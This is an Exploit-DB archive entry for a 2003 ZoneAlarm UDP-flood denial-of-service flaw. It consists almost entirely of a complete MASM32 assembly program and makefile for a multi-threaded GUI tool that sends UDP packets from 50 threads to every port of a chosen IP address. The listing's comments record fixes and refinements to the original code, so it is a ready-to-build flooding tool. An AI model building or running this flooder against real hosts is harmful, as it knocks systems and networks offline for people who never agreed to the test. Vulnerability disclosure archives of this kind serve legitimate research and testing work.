ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service Vulnerability 3

2003-09-02T00:00:00
ID EDB-ID:23090
Type exploitdb
Reporter Igor Franchuk
Modified 2003-09-02T00:00:00

Description

ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 Random UDP Flood Denial Of Service Vulnerability (3). DoS exploit for the Windows platform.

                                        
                                            source: http://www.securityfocus.com/bid/8525/info
  
A denial of service vulnerability has been alleged in ZoneAlarm. It is reportedly possible to reproduce this condition by sending a flood of UDP packets of random sizes to random ports on a system hosting the vulnerable software. Note that the listing below does not randomise either value: each of its 50 threads sends a fixed 40-byte payload to sequentially increasing destination ports over one shared UDP socket.

;//		          This is a multi-threaded UDP spammer (ZoneAlarm DoS test tool)
;/
;//
;//					 igor@email.ru  Igor Franchuk
;//						    
;//---------------------------------------------------------------------------

; #########################################################################
	.386
	.model flat, stdcall  
	option casemap :none  
	include \masm32\include\windows.inc
	include \masm32\include\kernel32.inc
	includelib \masm32\lib\kernel32.lib
	include \masm32\include\user32.inc 
	includelib \masm32\lib\user32.lib
	include \masm32\include\advapi32.inc
	includelib \masm32\lib\advapi32.lib
	include \masm32\include\comctl32.inc
	includelib \masm32\lib\comctl32.lib
	include \masm32\include\ws2_32.inc
	includelib \masm32\lib\ws2_32.lib

; #########################################################################
; Forward declarations (stdcall, per .model). Parameter names are documentation only.
WinMain		 proto hInst:DWORD, hPrevInst:DWORD, lpCmdLine:DWORD, nCmdShow:DWORD
SetTransparency  proto hWnd:DWORD, bAlpha:BYTE
GetRegString     proto :DWORD,:DWORD,:DWORD,:DWORD   ; declared but neither defined nor called in this listing
Spam	 	 proto ThreadID:DWORD
; #########################################################################
	.DATA
 	 ClassName db "ZADOSWndClassObject",0                 ; main window class name
	 Caption   db "ZoneAlarm DOS test",0                  ; main window title, also the MessageBox caption
	 User32lib db "user32",0                              ; loaded at run time by SetTransparency
 	 SetLayeredWindowAttributesName db "SetLayeredWindowAttributes",0  ; resolved via GetProcAddress (absent on old Windows)
 	 SBuf	   db 255,255,255,255,255,255,255,255,255,255,255,255  ; not referenced anywhere in this listing
	 IPEditBox db "SysIPAddress32",0                      ; common-control class of the target-address box
         BtnName   db "button",0 
 	 OKBtnCaption db "Spam",0 
	 msgEmptyAdr  db "Invalid IP",0 
 	 msgWinSockErrorAdr db "WinSocket 2.0 is required. WSAStartup failed",0  ; also reused as the 40-byte UDP payload in Spam
	 msgWinSockErrorSock db "Invalid socket",0
 	 CancelBtnCaption db "Cancel",0 
 	 ProtoName  db "udp",0                                ; getprotobyname argument
 	 CThread     DWORD 0                                  ; compared against each Spam thread's ID; never written anywhere in this listing
 	 GThreadExit DWORD 0                                  ; 1 = every Spam thread should stop (set by the Cancel button)
	.DATA?
	 hInstance   HANDLE ?	
	 hIPEditWnd  HANDLE ?                                 ; SysIPAddress32 control
	 hwndOKBtn      HANDLE ?                              ; "Spam" button
	 hwndCancelBtn  HANDLE ?                              ; "Cancel" button
	 icex        INITCOMMONCONTROLSEX <> ;declared but not referenced in this listing (InitCommonControls is used instead)
	 tIPAdr     DWORD ?                                   ; target IPv4 address; network byte order after REVERSE
	 Socket	    DWORD ?                                   ; the one UDP socket shared by all Spam threads
	 tIPAdrSN   HANDLE ?                                  ; char* returned by inet_ntoa (debug MessageBox)
         WSAData    WSADATA <> 
	 SIN 	    sockaddr_in <>                            ; shared target address; Spam threads rewrite sin_port in place
	 TID        HANDLE ?                                  ; overwritten by each CreateThread call; holds the last thread ID

	 PROTOENTSTRUCT STRUCT                                ; layout of Winsock's struct protoent as read by WndProc
	   p_name    DWORD ?
	   p_aliases DWORD ?
	   p_proto   DWORD ?                                  ; protocol number; the caller masks it to 16 bits
 	 PROTOENTSTRUCT  ENDS

	.CONST
	 WS_EX_LAYERED  equ 80000h
	 LWA_ALPHA      equ 2h
	 IPEditID       equ 100h                              ; child-control IDs
	 OKBtnID        equ 200h	 
	 CancelBtnID    equ 201h	 
	 IPM_ISBLANK    equ (WM_USER+105)                     ; SysIPAddress32 messages
	 IPM_GETADDRESS equ (WM_USER+102)

; #########################################################################
; REVERSE ip -> eax = ip with its four bytes in reverse order, i.e. host <-> network
; byte order for an IPv4 address on a little-endian CPU. Result in eax; clobbers the
; flags and nothing else (the original got the same result with ebx + xchg/shifts).
REVERSE MACRO ip
	mov eax, ip
	ror ax, 8                    ; swap bytes 0 and 1
	ror eax, 16                  ; bring bytes 2 and 3 down into ax
	ror ax, 8                    ; swap them too -> fully byte-reversed
ENDM

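; MAKEWORD bLow, bHigh -> eax = ((bHigh AND 0FFh) SHL 8) OR (bLow AND 0FFh), the
; Winsock version word (MAKEWORD 2, 0 requests Winsock 2.0 from WSAStartup).
; Fixes vs. the original: ebx is saved and restored (the caller's ebx was silently
; destroyed) and both operands are masked to a byte so an out-of-range value cannot
; bleed into the other half of the word. Result in eax; clobbers flags only.
MAKEWORD MACRO bLow, bHigh
    push ebx
    mov  ebx, bHigh
    and  ebx, 0FFh
    shl  ebx, 8
    mov  eax, bLow
    and  eax, 0FFh
    or   eax, ebx
    pop  ebx
ENDM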
; #########################################################################
	.CODE
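; Program entry. hInstance is the EXE module handle; the command line is fetched
; only because WinMain's signature takes it (the original comment on that call was
; a copy-paste error). WinMain returns the WM_QUIT exit code in eax; forward it to
; ExitProcess instead of discarding it as the original did.
start:
        invoke GetModuleHandle, NULL             ; module handle of this EXE
        mov hInstance, eax
        invoke GetCommandLine                    ; eax = command line (unused by WinMain)
        invoke WinMain, hInstance, NULL, eax, SW_SHOWDEFAULT
        invoke ExitProcess, eax                  ; exit code = msg.wParam from WinMain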
; #########################################################################
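;-----------------------------------------------------------------------
; WinMain — registers the window class, creates the main window and runs
; the message loop. Returns the WM_QUIT exit code (msg.wParam), or 0 when
; the class or the window could not be created (the original checked
; neither and carried on with a NULL window handle).
;-----------------------------------------------------------------------
WinMain proc hInst:HINSTANCE, hPrevInst:HINSTANCE, lpCmdLine:HANDLE, mCmdShow:DWORD
	LOCAL wc:WNDCLASSEX
	LOCAL msg:MSG
	LOCAL hWnd:HWND
	mov   wc.cbSize, SIZEOF WNDCLASSEX
	mov   wc.style, CS_DBLCLKS + CS_HREDRAW + CS_VREDRAW
	mov   wc.lpfnWndProc, OFFSET WndProc
	mov   wc.cbClsExtra, NULL
	mov   wc.cbWndExtra, NULL
	push  hInst
	pop   wc.hInstance
	mov   wc.hbrBackground, COLOR_WINDOW+1
	mov   wc.lpszMenuName, NULL
	mov   wc.lpszClassName, OFFSET ClassName
	invoke LoadIcon, NULL, IDI_APPLICATION
	mov   wc.hIcon, eax
	mov   wc.hIconSm, eax
	invoke LoadCursor, NULL, IDC_ARROW
	mov   wc.hCursor, eax
	invoke RegisterClassEx, addr wc
	.IF ax == 0                         ; returns an ATOM; 0 means failure
	    xor eax, eax
	    ret
	.ENDIF
	; The window style was the magic value 16CC0000h; spelled out, it is a
	; visible, captioned, resizable window with a system menu and no
	; minimise/maximise boxes, clipping its siblings and children.
	invoke CreateWindowEx,\
			WS_EX_LEFT + WS_EX_LTRREADING + WS_EX_TOOLWINDOW + WS_EX_WINDOWEDGE,\
			ADDR ClassName,\
			ADDR Caption,\
			WS_VISIBLE or WS_CLIPSIBLINGS or WS_CLIPCHILDREN or WS_CAPTION or WS_SYSMENU or WS_THICKFRAME,\
			CW_USEDEFAULT,\
			CW_USEDEFAULT,\
			256,\
			118,\
			NULL,\
			NULL,\
			hInst,\
			NULL
	mov   hWnd, eax
	.IF eax == 0                        ; window creation failed; eax is already 0
	    ret
	.ENDIF
	invoke SetTransparency, hWnd, 200   ; alpha 200/255, best effort (see SetTransparency)
	invoke ShowWindow, hWnd, mCmdShow
	invoke UpdateWindow, hWnd
	.WHILE TRUE
	    invoke GetMessage, ADDR msg, NULL, 0, 0
	    ; 0 = WM_QUIT, -1 = error. The original stopped only on 0, so an error
	    ; return would have spun forever dispatching a stale msg.
	    .BREAK .IF (eax == 0) || (eax == -1)
	    invoke TranslateMessage, ADDR msg
	    invoke DispatchMessage, ADDR msg
	.ENDW
	mov   eax, msg.wParam               ; exit code posted by PostQuitMessage
	ret
WinMain endp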
; #########################################################################
;-----------------------------------------------------------------------
; SetTransparency — best-effort per-window alpha. SetLayeredWindowAttributes
; is resolved at run time through LoadLibrary/GetProcAddress so the program
; still loads on Windows versions without it; when it is missing, or user32
; cannot be loaded, the window is simply left opaque.
;   hWnd   - window to mark WS_EX_LAYERED
;   bAlpha - alpha 0..255 (255 = opaque); only the low byte of the pushed
;            argument is ever read
; Returns nothing meaningful; clobbers eax, ecx, edx (stdcall callee).
;-----------------------------------------------------------------------
SetTransparency proc hWnd:HANDLE, bAlpha:BYTE
   LOCAL hUser32:HANDLE
   LOCAL pfnSetLWA:DWORD
   invoke LoadLibrary, addr User32lib
   mov hUser32, eax
   .IF hUser32 != 0
      invoke GetProcAddress, hUser32, addr SetLayeredWindowAttributesName
      mov pfnSetLWA, eax
      .IF pfnSetLWA != 0
         invoke GetWindowLong, hWnd, GWL_EXSTYLE
         or eax, WS_EX_LAYERED
         invoke SetWindowLong, hWnd, GWL_EXSTYLE, eax
         ; stdcall: args pushed right to left, callee cleans the stack
         movzx eax, bAlpha
         push LWA_ALPHA
         push eax
         push NULL
         push hWnd
         call dword ptr pfnSetLWA
      .ENDIF
      invoke FreeLibrary, hUser32
   .ENDIF
   ret
SetTransparency endp
; #########################################################################
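;-----------------------------------------------------------------------
; WndProc — window procedure for the main "ZoneAlarm DOS test" window.
; hWnd/uMsg/wParam/lParam are the standard Win32 window-procedure arguments.
; Returns 0 for the messages handled here, DefWindowProc's result otherwise.
; Win32 callbacks must preserve ebx/esi/edi: the USES list does that (the
; original clobbered ebx in WM_SIZE and ebx/edi in the Spam handler).
;-----------------------------------------------------------------------
UDP_PROTO_NUMBER equ 17                    ; IANA protocol number for UDP (IPPROTO_UDP)

WndProc proc uses ebx esi edi, hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
    LOCAL protoent:DWORD
    mov eax, uMsg
    .IF eax == WM_DESTROY
        invoke PostQuitMessage, NULL
    .ELSEIF eax == WM_CREATE
        ; NOTE(review): SysIPAddress32 is documented as needing
        ; InitCommonControlsEx(ICC_INTERNET_CLASSES); the unused icex global
        ; looks like that was intended. Kept as-is -- confirm on the target comctl32.
        invoke InitCommonControls
        invoke CreateWindowEx, NULL, ADDR IPEditBox, NULL,\
                   WS_VISIBLE or WS_BORDER or WS_CHILD, 11,\
                   90, 180, 25, hWnd, IPEditID,\
                   hInstance, NULL
        mov hIPEditWnd, eax
        invoke CreateWindowEx, NULL, ADDR BtnName, ADDR OKBtnCaption,\
                   WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON or BS_FLAT,\
                   35, 50, 80, 25, hWnd, OKBtnID, hInstance, NULL
        mov hwndOKBtn, eax
        invoke CreateWindowEx, NULL, ADDR BtnName, ADDR CancelBtnCaption,\
                   WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON or BS_FLAT,\
                   134, 50, 80, 25, hWnd, CancelBtnID, hInstance, NULL
        mov hwndCancelBtn, eax
        invoke EnableWindow, hwndCancelBtn, FALSE
        ; bAlpha is a BYTE parameter: the original passed 500, of which only the
        ; low byte (244) was ever read. Pass the value that actually took effect.
        ; NOTE(review): a layered *child* window is only honoured on newer Windows
        ; versions -- this is best effort either way.
        invoke SetTransparency, hwndOKBtn, 244
        invoke SetFocus, hIPEditWnd
    .ELSEIF eax == WM_SIZE
        ; Re-centre the controls: x = clientWidth/2 - 90; Cancel sits 99px right
        ; of the Spam button (matches the 35/134 creation positions). The client
        ; height in the high word of lParam is not used.
        mov eax, lParam
        and eax, 0FFFFh
        shr eax, 1
        sub eax, 90
        mov ebx, eax                          ; preserved across the stdcall calls below
        lea esi, [ebx + 99]
        invoke MoveWindow, hIPEditWnd, ebx, 10, 180, 25, TRUE
        invoke MoveWindow, hwndOKBtn, ebx, 50, 80, 25, TRUE
        invoke MoveWindow, hwndCancelBtn, esi, 50, 80, 25, TRUE
    .ELSEIF eax == WM_COMMAND
        ; lParam == 0 would be a menu/accelerator command; there are none here.
        .IF lParam != 0
            mov eax, wParam
            movzx edx, ax                     ; edx = control ID (low word)
            shr eax, 16                       ; ax  = notification code (high word)
            .IF (edx == OKBtnID) && (ax == BN_CLICKED)
                invoke SendMessage, hIPEditWnd, IPM_ISBLANK, 0, 0
                .IF eax
                    invoke MessageBox, hWnd, ADDR msgEmptyAdr, ADDR Caption, MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
                    invoke SetFocus, hIPEditWnd
                .ELSE
                    ; IPM_GETADDRESS delivers the address with the first octet in
                    ; the high byte; REVERSE byte-swaps it into the order
                    ; sockaddr_in.sin_addr expects.
                    invoke SendMessage, hIPEditWnd, IPM_GETADDRESS, 0, ADDR tIPAdr
                    REVERSE tIPAdr
                    mov tIPAdr, eax
                    ; Debug confirmation of the parsed target (kept from the original).
                    invoke inet_ntoa, tIPAdr
                    mov tIPAdrSN, eax
                    invoke MessageBox, NULL, tIPAdrSN, tIPAdrSN, MB_OK + MB_SYSTEMMODAL
                    MAKEWORD 2, 0                                   ; request Winsock 2.0
                    invoke WSAStartup, eax, ADDR WSAData
                    .IF eax
                        invoke MessageBox, hWnd, ADDR msgWinSockErrorAdr, ADDR Caption, MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
                    .ELSE
                        ; getprotobyname can return NULL; the original dereferenced
                        ; the result unconditionally. Fall back to the well-known
                        ; UDP protocol number instead of crashing.
                        invoke getprotobyname, ADDR ProtoName
                        mov protoent, eax
                        .IF eax
                            mov edi, eax
                            assume edi:PTR PROTOENTSTRUCT
                            mov ebx, [edi].p_proto
                            assume edi:nothing
                            and ebx, 0FFFFh                         ; p_proto is 16 bits wide
                        .ELSE
                            mov ebx, UDP_PROTO_NUMBER
                        .ENDIF
                        invoke socket, AF_INET, SOCK_DGRAM, ebx
                        .IF eax == INVALID_SOCKET
                            invoke WSAGetLastError
                            invoke MessageBox, hWnd, ADDR msgWinSockErrorSock, ADDR Caption, MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
                            invoke WSACleanup                        ; balance the WSAStartup above
                        .ELSE
                            mov Socket, eax
                            invoke EnableWindow, hwndOKBtn, FALSE
                            invoke EnableWindow, hwndCancelBtn, TRUE
                            mov SIN.sin_family, AF_INET
                            push tIPAdr
                            pop SIN.sin_addr
                            mov GThreadExit, 0
                            ; Start 50 worker threads (esi is preserved by the stdcall
                            ; APIs, so no push/pop around the call). Creation flags are 0:
                            ; the original passed NORMAL_PRIORITY_CLASS (20h), a
                            ; process-priority flag with no defined meaning for
                            ; CreateThread. The returned handles were never closed;
                            ; closing them does not stop the threads.
                            xor esi, esi
                            .WHILE esi < 50
                                invoke CreateThread, NULL, NULL, OFFSET Spam, esi, 0, ADDR TID
                                .IF eax
                                    invoke CloseHandle, eax
                                .ENDIF
                                inc esi
                            .ENDW
                        .ENDIF
                    .ENDIF
                .ENDIF
            .ELSEIF (edx == CancelBtnID) && (ax == BN_CLICKED)
                invoke EnableWindow, hwndOKBtn, TRUE
                invoke EnableWindow, hwndCancelBtn, FALSE
                mov GThreadExit, 1                ; workers poll this flag and exit
                invoke closesocket, Socket        ; a send in flight just fails; harmless
            .ENDIF
        .ENDIF
    .ELSE
        invoke DefWindowProc, hWnd, uMsg, wParam, lParam
        ret
    .ENDIF
    xor eax, eax
    ret
WndProc endp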
; #########################################################################
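;-----------------------------------------------------------------------
; Spam — worker thread body (one of 50). Sends a fixed 40-byte payload (the
; start of msgWinSockErrorAdr) to the target address in SIN, walking the
; destination port 1..65535 then 0 and repeating, until GThreadExit is set
; or CThread equals this thread's ID.
;   ThreadID - index passed by CreateThread's lpParameter
; Returns 0 as the thread exit code.
; Fixes vs. the original:
;   * Every thread rewrote the shared SIN.sin_port and re-connect()ed the one
;     shared socket, racing each other. Each thread now fills a private
;     sockaddr_in and uses sendto(), so nothing shared is written.
;   * The stop flags are checked before a packet goes out, not after.
;   * ebx/esi are declared in USES rather than clobbered.
; NOTE(review): CThread is 0 and never written anywhere in this listing, so
; the thread whose ThreadID is 0 stops immediately; the intent is unclear, so
; the check is kept as written.
;-----------------------------------------------------------------------
Spam proc uses ebx esi, ThreadID:DWORD
    LOCAL dst:sockaddr_in

    ; Private destination: family/address copied from the shared SIN (filled in
    ; by the Spam button handler before the threads start); port set per packet.
    mov    ax, SIN.sin_family
    mov    dst.sin_family, ax
    mov    eax, dword ptr SIN.sin_addr
    mov    dword ptr dst.sin_addr, eax
    mov    dword ptr dst.sin_zero, 0
    mov    dword ptr dst.sin_zero[4], 0

    xor    esi, esi                      ; esi = host-order port counter
    mov    ebx, 1                        ; ebx = keep-running flag
    .WHILE ebx
        mov    eax, ThreadID
        .IF CThread == eax
            mov ebx, 0
        .ENDIF
        .IF GThreadExit == 1
            mov ebx, 0
        .ENDIF
        .IF ebx
            .IF esi < 65535
                inc esi
            .ELSE
                xor esi, esi
            .ENDIF
            invoke htons, esi
            mov    dst.sin_port, ax
            ; If Cancel has already closed Socket this just fails; the flag
            ; check above ends the loop on the next pass.
            invoke sendto, Socket, ADDR msgWinSockErrorAdr, 40, 0, ADDR dst, SIZEOF sockaddr_in
        .ENDIF
    .ENDW
    xor    eax, eax
    ret
Spam endp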
end start

--------------------------------------make file-------------------------------------------

NAME=zados
# nmake: assemble zados.asm with MASM32 (ml) and link it as a Windows GUI executable
$(NAME).exe: $(NAME).obj
        Link   /SUBSYSTEM:WINDOWS /LIBPATH:c:\masm32\lib $(NAME).obj
# /c = assemble only, /coff = COFF object format, /Cp = preserve identifier case
$(NAME).obj: $(NAME).asm
        ml /c /coff /Cp  $(NAME).asm